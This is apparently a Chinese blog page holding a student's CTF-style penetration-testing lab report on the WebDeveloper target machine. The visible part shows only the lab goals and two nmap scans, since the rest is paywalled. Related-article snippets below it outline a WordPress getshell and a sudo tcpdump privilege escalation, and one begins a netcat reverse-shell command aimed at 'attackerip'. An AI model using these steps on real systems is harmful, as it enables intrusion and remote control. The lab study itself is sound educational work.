网络渗透实验四

最新推荐文章于 2023-02-17 09:20:15 发布
VIP文章 最新推荐文章于 2023-02-17 09:20:15 发布
阅读量644 收藏 1
点赞数
分类专栏: Kali网络渗透实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mask__er/article/details/111187844
版权

文章目录

一、实验目的

通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。

二、实验准备

  • 靶机:WebDeveloper
  • 工具:kali
  • 连接方式:NAT
  • 目标:抓获靶机文件 /root/flag.txt 拿到flag

三、实验过程

1.用namp扫描整个网段,发现靶机IP和端口开放情况

扫描完毕后,129是我的ip地址,筛选之后便是134为靶机的IP

nmap -sP 192.168.119.0/24

在这里插入图片描述
端口开放为两个端口

nmap -sS 192.168.119.134

最低0.47元/天 解锁文章
Poir0t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络渗透实验四.docx
12-13
网络渗透实验四.docx
一篇不错的网络数据抓包
qxf865618770的博客
05-20 1388
一,网络抓包Android 手机抓包adb shell tcpdump -p -vv -s 0 -w /sdcard/capture.pcapadb pull /sdcard/capt...
vulnhub Web Developer: 1
箭雨镜屋
01-02 1836
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
linux7.0提权工具,CentOS 7系统配置sudo策略(附sudo提权演示)
weixin_42203424的博客
05-08 596
一、操作目的和应用场景某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的权限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户权限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。二、平台及工具版本...
tcpdump抓包工具-使用
xingmiao
12-16 295
tcpdump抓包工具 tcpdump需要在root下或sudo提权执行 用法 tcpdump [参数列表] [过滤条件表达式] 参数 # -i 指定抓包的网卡,如 -i 网卡名 # port 80 ,指定抓取80端口的数据包 # host ,指定ip地址 # -c 指定抓包的数量,及最后显示的数量 # -v 输出一个稍微详细的信息,例如在ip包中能够包括ttl和服务类型的信息; # -vv 输出详细的报文信息; # -a 将网络地址和广播地址转变成名字 # -n不进行IP地址到主机名的转换(显示ip地
tcpdump
lyyslsw的专栏
12-30 1193
linux 普通用户默认是没有权限使用tcpdump的, 所以需要root 用户赋权: root# setcap cap_net_raw=eip /usr/sbin/tcpdump 不要为普通用户添加tcpdump的sudo权限, zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...
sudo-tcpdump提权法
weixin_30621711的博客
02-01 551
当当前用户可以通过sudo执行tcpdump时,可以用来进行提权 tcpdump中有两个参数-z和-Z,前者用来执行一个脚本,后者用来指定tcpdump以哪个用户运行,当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的 一、编写反向shell脚本 #shell.sh mknod backpipe p && nc attackerip ...
网络渗透测试实验
qq_63016521的博客
11-24 626
网络渗透测试实验
网络渗透测试实验四-CTF实践(WebDeveloper靶机渗透
YatKTm的博客
12-06 3086
文章目录前言实验目的系统环境实验工具实验原理:1、什么是CTF1.1 CTF竞赛模式(1)解题模式(Jeopardy)(2)攻防模式(Attack-Defense)(3)混合模式(Mix)1.2 CTF各大题型简介MISC(安全杂项)PPC(编程类)CRYPTO(密码学)STEGA(隐写)PWN(溢出)WEB(web类)实验步骤和内容:目的基本思路实现过程:1、发现目标 (netdiscover),找到WebDeveloper的IP地址。2、利用NMAP扫描目标主机,发现目标主机端口开放、服务情况,截图并说
网络渗透测试实验报告三
最新发布
12-27
网络渗透测试实验报告三
网络渗透测试实验报告二
12-27
网络渗透测试实验报告二
网络渗透实验三.docx
01-10
网络渗透实验三.docx
网络渗透实验二.docx
01-10
网络渗透实验二.docx
一文吃透Linux提权
weixin_45727359的博客
11-07 2405
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
网络安全之提权攻击
qq_51068285的博客
02-17 916
提权攻击的原理与防护
渗透提权-解决tcp限制神器
Sumarua的博客
06-22 410
渗透提权-解决tcp限制神器 资源已上传至☞:https://download.csdn.net/download/weixin_43510203/12543331
生命在于学习——Linux提权
易水哲的博客
11-03 1554
Linux提权的学习笔记记录。
网络安全渗透测试入门
07-27
4. 设置实验环境:建立一个安全的实验环境,例如使用虚拟机或容器,以便在没有对真实系统造成影响的情况下进行实践。 5. 信息收集:使用各种技术和工具,如WHOIS查询、端口扫描、网络映射等,收集目标系统和网络的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值